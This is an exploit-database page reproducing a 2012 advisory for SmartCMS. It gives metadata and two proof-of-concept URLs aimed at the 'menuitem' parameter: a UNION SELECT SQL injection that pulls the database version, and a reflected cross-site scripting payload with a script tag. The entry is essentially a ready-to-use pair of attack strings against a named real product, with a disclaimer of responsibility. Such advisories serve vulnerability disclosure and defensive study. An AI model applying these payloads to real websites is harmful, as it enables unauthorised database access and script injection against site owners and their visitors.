[] NeoSense
E X P L O I T S
title author type platform port cve id

SmartCMS - '/index.php?menuitem' SQL Injection / Cross-Site Scripting

Author: Yakir Wizman
type: webapps
platform: php
port: 
date_added: 2012-11-30 
date_updated: 2012-11-30 
verified: 0 
codes: OSVDB-88056;OSVDB-88055 
tags: 
aliases:  
screenshot_url:  
application_url: 
##########################################################################
## SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
## Date: 29/11/2012
## Version: ALL
## Vendor Link: http://smartcms.nl/
## ISRAEL
##########################################################################
##          Author will be not responsible for any damage.
##########################################################################
## SQL Injection PoC:
## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
## Cross Site Scripting PoC:
## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23
##########################################################################
# 0x31337.net
##########################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.